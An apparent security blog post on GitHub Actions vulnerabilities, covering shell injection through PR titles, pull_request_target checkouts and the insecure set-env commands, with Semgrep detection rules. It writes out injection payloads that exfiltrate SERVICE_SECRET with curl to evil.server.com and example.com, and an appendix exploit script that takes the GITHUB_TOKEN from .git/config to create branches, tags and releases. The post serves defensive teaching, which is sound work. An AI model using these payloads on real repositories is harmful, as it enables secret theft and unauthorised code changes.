Protect Your GitHub Actions with Semgrep

by Grayson Hardaway on October 01, 2021

semgrep --config p/github-actions

❗ Demo repository for this post: https://github.com/minusworld-gha-demo/shell-injection. If you fork this repository, make sure you delete it when you’re done!

GitHub Actions keep me up at night.


I worry that a malicious actor will use GitHub Actions to inject code into one of my repositories unbeknownst to me.

Before doing the deep dive that resulted in this post, I didn’t understand in detail what GitHub Actions had access to, which made me nervous. This fear only heightened as I came across various security advisories for GitHub Actions, like this one and this one, prompting me to look into the system to make sure we weren’t exposing ourselves to obvious attacks. My ultimate goal was to use Semgrep’s YAML support to write Semgrep rules for detecting, and ultimately preventing, vulnerabilities in our GitHub Actions workflows.

Fortunately, GitHub Security Lab already had some phenomenal research into GitHub Actions (GHA) vulnerabilities. Their three-part series covers the security implications of the pull_request_target trigger in part 1, injection attacks in part 2, and supply chain considerations when using third-party Actions in part 3. If you’re unfamiliar with the security implications of GHA like I was, I highly recommend the series—in addition to the security hardening docs for GHA.

Impact of a compromised GitHub Action

Broadly speaking, GHA runners are ephemeral workers that interact with the repository in some way. Some runners use workflows that only interact with the repository passively, such as those that build the project. Others interact actively with the repository in order to do things such as leave automated pull request comments or format the code.

There are two primary security concerns with a compromised runner: stolen secrets and unwanted modifications to the repository.

Stolen secrets

The secrets available to a runner differ based on its context. Generally speaking, any secrets exposed via environment variables are targets for theft. The impact of stolen secrets is limited to whatever access the secrets give. If AWS credentials were stolen, an attacker would have the same access as those credentials; if the https://semgrep.dev token we issue for CI scans were stolen, an attacker would have access to that organization’s Semgrep findings.

Unwanted repository modifications

An attacker can also make modifications to your code if they compromise a runner with write permissions to your repository. This is tantamount to any other code injection vulnerability for users of your code — an attacker could add their own malicious code surreptitiously which runs whenever your code runs. For an attacker to make modifications, they need to obtain GitHub credentials with write permissions to the repository. One way to do this is to steal a runner’s GITHUB_TOKEN. A GITHUB_TOKEN is a special token for the GHA runner granting it privileges to interact with the repository. GITHUB_TOKENs are temporary; they are generated when the workflow starts and expire as soon as the workflow is finished.

Generally, you don’t have to worry about some random PR action making modifications to your repository if the submitter doesn’t already have write access. GITHUB_TOKENs have thoughtful permissions that do not grant write access to runners activated by the pull_request trigger from forked repositories. There are, however, some conditions with the pull_request_target trigger that enable a random PR to make modifications. The pull_request_target section in this post discusses this in more detail.

You must also be mindful of other workflow triggers. For example, the issues trigger in a GHA workflow file fires when anyone files an issue on your repository and creates a runner where the GITHUB_TOKEN has write permissions. If an attacker can compromise such a runner, they could steal that GITHUB_TOKEN and make modifications to the repository.

Other ways to give a runner write permissions include personal access tokens or users’ SSH keys. These methods are generally discouraged.

In summary:

  • Secrets can be stolen via compromised runners in some circumstances.
    • Generally, secrets are exposed via environment variables.
    • A runner with elevated permissions could read repository secrets.
  • A repository can be surreptitiously modified in some circumstances if a compromised runner has write permissions to the repository.
    • Runners have GITHUB_TOKENs with write permissions on some workflow triggers like issues, pull_request_target, and others, but not on pull_request from forks.
    • Runners have write permissions if given a user’s authentication method, such as a personal access token or SSH key, with write access to the repository.

During EkoParty 2020’s GitHub CTF, players were able to compromise a GHA runner and exfiltrate repository secrets containing the flag. Check out the awesome writeup here to see what a runner compromise might look like in the real world. And, check out GitHub’s own section on the impact of compromised runners for additional information.

Shell injection

The most direct way a GHA runner could be compromised is with a shell injection. GHA workflow files let authors write a custom shell script using the run: key. Authors can insert dynamic data into the script using the delimiters ${{ ... }}. For example, you can insert the pull request title like this: ${{ github.event.pull_request.title }}. This inserted data is not always trustworthy and an attacker can use it to inject arbitrary code into the action.

Anything starting with github. is part of the GitHub context. Some of the context’s properties, such as github.event.pull_request.title, are user-controllable (and therefore untrustworthy). GitHub Security Lab lists a set of properties that can contain untrusted input, and if any of these properties is inserted directly into a run script, you have a shell injection vulnerability. An attacker can craft a malicious PR title, email address, or even branch name to inject arbitrary code into the script.

Imagine an attacker trying to steal secrets from a runner that sends notifications about new PRs to some service. A workflow step POSTs the PR title to the notification service, using a SERVICE_SECRET as authorization for the request. The POST request happens in a run script where the PR title is obtained using ${{ github.event.pull_request.title }}. An attacker could create a malicious PR title like

";curl http://evil.server.com?token=$SERVICE_SECRET;x="

to exfiltrate the SERVICE_SECRET. Now, the attacker has all the privileges of the SERVICE_SECRET. Hypothetically, if the notification service were AWS’s Simple Notification Service (SNS) and the SERVICE_SECRET authorized a highly privileged role on the AWS account, the attacker would have successfully compromised the AWS account.

Exfiltrating a secret from a GHA runner with a malicious PR title
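The attack described above can be reproduced locally without touching GitHub. The following is a minimal sketch, not the demo repository's workflow: the run script template, the secret value, and the notification message are all hypothetical, printf stands in for the ${{ ... }} substitution, and echo stands in for the attacker's curl so that nothing leaves your machine.

```shell
# Simulation only: echo replaces curl, so no network request is made.
SERVICE_SECRET='s3cr3t-demo-value'   # hypothetical secret
export SERVICE_SECRET

# Hypothetical run: script. The %s marks the spot where
# ${{ github.event.pull_request.title }} would appear in the workflow file.
template='title="%s"; echo "notifying service about: $title"'

# Attacker-controlled PR title, modeled on the payload in this post.
pr_title='";echo "exfiltrated: $SERVICE_SECRET";x="'

# Step 1: plain text substitution, before any shell looks at the script.
rendered=$(printf "$template" "$pr_title")
printf 'rendered script:\n%s\n' "$rendered"

# Step 2: only now is the rendered text executed as shell code.
output=$(sh -c "$rendered")
printf 'script output:\n%s\n' "$output"
```

The rendered script contains three extra statements that the workflow author never wrote. The quotes in the title close the original string, and everything after the first semicolon runs as code with access to the runner's environment.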

If you’re curious to try this for yourself, you can exploit the shell-injection workflow at this demo repository that I set up while writing this post. Be sure to delete your fork if you make one!

Scan your GHA workflows for this shell injection vulnerability with this new Semgrep rule.

To mitigate this vulnerability, place data from the GitHub context into an environment variable first, then use the environment variable in the run script. This works because the ${{ ... }} syntax is interpolated into a script file before the runner begins execution, inserting the contents directly as if it were script code. By using an environment variable, the data is inserted while the script is already running, preventing influence over the script code itself.
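To see why the environment variable approach holds up, here is a small local sketch under stated assumptions: PR_TITLE is a hypothetical variable name, the secret and message are made up, and the variable is set by hand where a workflow would set it with an env: entry on the step that assigns ${{ github.event.pull_request.title }} to it.

```shell
SERVICE_SECRET='s3cr3t-demo-value'   # hypothetical secret
export SERVICE_SECRET

# The same kind of malicious title an attacker might submit.
pr_title='";echo "exfiltrated: $SERVICE_SECRET";x="'

# The script text is fixed. It never contains the title itself,
# only a reference to the PR_TITLE environment variable.
script='echo "notifying service about: $PR_TITLE"'

# The title reaches the script as data at run time.
output=$(PR_TITLE="$pr_title" sh -c "$script")
printf '%s\n' "$output"
```

The shell expands $PR_TITLE once and does not parse the result again, so the payload is printed verbatim, including the literal text $SERVICE_SECRET, and no injected command runs.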

⚠️ The run script is not the only location for introducing a vulnerability. If any third-party Action, written in any language, uses these properties in an unsafe way then a GHA runner using that Action can be compromised. For an example, I refer you once again to this EkoParty GitHub CTF challenge, which injects ${{ github.event.issue.body }} into a call to os.system(...) in a Python script via environment variables. 😱 So, even though environment variables are safe for run scripts, they’re not safe for everything! ☠️
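The same pitfall can be sketched in shell. This is an analogy under stated assumptions, not the CTF challenge's code: ISSUE_BODY is a hypothetical variable, and building a command string for sh -c plays the role that os.system(...) plays in the Python case.

```shell
# Hypothetical attacker-controlled issue body, delivered via an environment variable.
ISSUE_BODY='hello; echo "injected command ran"'
export ISSUE_BODY

# Unsafe: the value is spliced into a new command string, which a second
# shell then parses as code.
unsafe_output=$(sh -c "echo $ISSUE_BODY")

# Safe: the command string is constant and the value is only read as data.
safe_output=$(sh -c 'echo "$ISSUE_BODY"')

printf 'unsafe:\n%s\n\nsafe:\n%s\n' "$unsafe_output" "$safe_output"
```

The environment variable protects you only as long as nothing downstream turns its contents back into source code.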

pull_request_target

An indirect vehicle for compromise is via [pull_request_target](https://docs.github.com/en/actions/reference/events-that-trigger-workflows#pull_request_target). This workflow trigger behaves just like its sibling, pull_request, except that the GHA runner runs in the context of the target repository. To be explicit, the target repository is the repository that the pull request is attempting to merge code into. This repository is distinct from forks, which are totally independent from their original repositories.

GHA runners triggered with pull_request_target have two properties that are relevant for this section:

  1. The runner uses the code of the target repository, not the incoming pull request’s repository
  2. The runner uses the environment (think: secrets and write permissions) of the target repository, not the incoming pull request’s repository

Because of (1), using pull_request_target is usually safe from malicious attempts to abuse (2) because it does not use the incoming pull request’s code. However, if the runner were to explicitly check out and use the incoming pull request’s code... well, then we’ve violated (1), and now we’re in dangerous territory. 😵

I see no way this could possibly go wrong

There are a lot of components in play, so let me summarize:

  • The pull_request trigger uses incoming code but does not have write permissions or access to the target repo’s secrets.
  • The pull_request_target trigger uses the target code and does have write permissions and access to the target repo’s secrets.
  • Therefore, the dangerous situation here is explicitly checking out the incoming code, because it now has write permissions and access to the target repo’s secrets.

A GHA workflow can check out the incoming code in a variety of ways, the most common of which is with the actions/checkout Action. If the GHA workflow 1) uses pull_request_target, and 2) checks out the incoming code, we’re really flirting with disaster—the only thing needed to enable full runner compromise is a workflow step that executes any part of the incoming code. make, npm install, and python setup.py install are all examples of executable code which an attacker would have influence over. Simply modify one of the relevant files, make an incoming pull request, and the GHA runner is compromised.

Scan your workflow files for explicit checkouts of incoming code with the pull_request_target trigger using this new Semgrep rule.

To be clear, not every instance of pull_request_target paired with checking out incoming code is a vulnerability. If the workflow does not run any of the incoming code, then it is safe. However, this pair of patterns is an indicator of dangerous behavior and should be audited very closely. I suggest using this Semgrep rule to scan your GHA workflows and very closely review any findings.
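As a rough illustration of the pattern pair being audited, here is a crude grep-based heuristic. It is a sketch and not the Semgrep rule: it matches text rather than YAML structure, the function name is hypothetical, and the two sample workflow files are invented for the demonstration. It will miss checkouts done by other means and can flag workflows that are in fact safe.

```shell
# Flag a workflow file that mentions pull_request_target and also references
# the incoming pull request's head ref or SHA.
is_risky_workflow() {
  grep -q 'pull_request_target' "$1" &&
    grep -Eq 'github\.event\.pull_request\.head\.(sha|ref)' "$1"
}

# Two invented sample workflows in a scratch directory.
workdir=$(mktemp -d)

cat > "$workdir/risky.yml" <<'EOF'
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: ./build
EOF

cat > "$workdir/ok.yml" <<'EOF'
on: pull_request
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: ./build
EOF

for f in "$workdir"/*.yml; do
  if is_risky_workflow "$f"; then
    echo "REVIEW: $(basename "$f")"
  else
    echo "ok:     $(basename "$f")"
  fi
done
```

In risky.yml, the ./build step runs a file from the incoming pull request with the target repository's secrets and write permissions, which is exactly the combination to review by hand.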

In general, don’t use pull_request_target unless you need to and can verify that you’re not running anything from the incoming code.

Branch protections provide a decent safeguard against an attacker directly committing malicious code to your repository. While trying to exploit the explicit-checkout workflow in the demo repo, I set branch protections to see how easy it would be to work around. When trying to commit directly to the main branch, a review was still required even though I had write permissions. And, if I used my permissions to approve a pull request with malicious content, it was approved as the user github-actions, not a repository owner, and therefore did not count toward the review requirement. However, I was still able to create arbitrary release objects.

GHSA-g86g-chm8-7r2p is an actual occurrence of this vulnerability in the wild; the researcher published a great read on the specifics of the vulnerability and demonstrates why checking out incoming code with pull_request_target is dangerous.

Also, if you want to investigate the behavior of pull_request_target for yourself, you can try to exploit the explicit-checkout workflow in this demo repository I set up while writing this post. Make sure to delete your fork if you make one!

⚠️ Incoming code can be checked out in many ways besides the checkout Action, such as a shell script that runs an explicit git checkout command. If you need pull_request_target, make sure none of your third-party Actions check out the incoming code!

ACTIONS_ALLOW_UNSECURE_COMMANDS

Not only will this kill you, it will hurt you the whole time you are dying

As the name implies, ACTIONS_ALLOW_UNSECURE_COMMANDS is an environment variable in GHA runners that, if set, permits the use of the insecure commands set-env and add-path. GitHub deprecated these commands when it became clear that the implementation was insecure, and an alternative called Environment Files was created. From the GitHub Security Advisory on these commands: “Workarounds: None, it is strongly suggested that you upgrade as soon as possible.”

ACTIONS_ALLOW_UNSECURE_COMMANDS was kept for backward compatibility, but should never be used. Use Environment Files instead, and use this Semgrep rule to scan for this variable.
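For reference, here is a minimal sketch of what the Environment Files replacement looks like inside a run script. BUILD_MODE and /opt/tools/bin are hypothetical values. On a real runner, GITHUB_ENV and GITHUB_PATH point at files the runner provides; the fallback to temporary files exists only so the sketch also runs on a local machine.

```shell
# Outside a runner these variables are unset, so fall back to scratch files.
: "${GITHUB_ENV:=$(mktemp)}"
: "${GITHUB_PATH:=$(mktemp)}"

# Deprecated workflow commands, shown only for comparison
# (these are what ACTIONS_ALLOW_UNSECURE_COMMANDS re-enables):
#   echo "::set-env name=BUILD_MODE::release"
#   echo "::add-path::/opt/tools/bin"

# Environment Files: append to the files named by GITHUB_ENV and GITHUB_PATH.
echo "BUILD_MODE=release" >> "$GITHUB_ENV"
echo "/opt/tools/bin" >> "$GITHUB_PATH"

printf 'GITHUB_ENV now contains:\n'
cat "$GITHUB_ENV"
```

The deprecated commands were read from a step's standard output, whereas the replacement requires an explicit write to a file, so merely printing untrusted text is no longer enough to change the environment of later steps.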

Closing thoughts

I’ve deployed these Semgrep rules on our repositories to continuously scan for any egregious violations (there were none! 🙌 ) and I hope that you’ll find them useful as well. There are probably other exploits, but this covers the most obvious cases. Still, always employ common sense precautions like treating GitHub context data as untrusted input and setting branch protections on your default branch.

That said, the GHA ecosystem is pretty wild, and these rules only protect us from making our own mistakes; they do little to guard us against transitive dependency issues in third-party Actions. We’ll be auditing our third-party Actions right away and we encourage everyone to do the same!

Appendix A: A crash course in GITHUB_TOKEN permissions

While experimenting with the demo repo, I discovered that the GITHUB_TOKEN can only make what GitHub esoterically calls server-to-server requests to the GitHub API. Some requests that I made, like trying to remove branch protections, were met with an error that simply read, “Resource not accessible by integration”. (This is the only resource I could find mentioning user-to-server requests, but I couldn’t find anything about server-to-server.)

While experimenting with permissions on the demo repo, I realized that entries in this GITHUB_TOKEN permissions table correspond to sections of this API reference for GitHub App permissions. Sure enough, any API call in the contents section, pull requests section, or any other section with a corresponding row in the GITHUB_TOKEN permissions table was accessible with a GITHUB_TOKEN that had write permissions. I can only assume these are server-to-server requests. Anything not listed in the GITHUB_TOKEN permissions table was not accessible to me; I assume those are the user-to-server requests, which require a different kind of authorization.

Anyway, the important takeaway is that the GITHUB_TOKEN permissions table plus the API reference spell out exactly what is accessible with a GITHUB_TOKEN. You can use these resources to understand what a compromised GITHUB_TOKEN has access to.

GITHUB_TOKEN permissions and API routes it can access

Appendix B: Payloads for demo repo

shell-injection

";echo $SERVICE_SECRET;curl http://example.com?token=$SERVICE_SECRET;x="
Image of the shell-injection payload in a GitHub PR title

explicit-checkout

#!/usr/bin/env bash

# overwrite './build' with this script to exploit explicit-checkout

# actions/checkout stores the GITHUB_TOKEN in a file called .git/config;
# the grep/cut pair extracts the value that follows "AUTHORIZATION:"
authfield=$(grep AUTHORIZATION .git/config | cut -d':' -f 2)

SIDE_BRANCH="a-side-branch"
RELEASE="v1.0.6"

# Create content in a side branch
# Since there's an explicit checkout of incoming code, this
# will actually be the incoming git repository. Any contents
# in the incoming repository will be in this side branch
git checkout -b "$SIDE_BRANCH"
git push origin "$SIDE_BRANCH"

commit_hash=$(git rev-parse HEAD)

# Create a tag using the side branch
curl --request POST \
  --url https://api.github.com/repos/minusworld-gha-demo/shell-injection/git/refs \
  --header "Authorization: $authfield" \
  --header "Accept: application/vnd.github.v3+json" \
  --data "{ \"ref\": \"refs/tags/$RELEASE\", \"sha\": \"$commit_hash\" }"

# Create release
curl --request POST \
  --url https://api.github.com/repos/minusworld-gha-demo/shell-injection/releases \
  --header "Authorization: $authfield" \
  --header "Accept: application/vnd.github.v3+json" \
  --data "{ \"tag_name\": \"$RELEASE\", \"target_commitish\": \"$commit_hash\" }"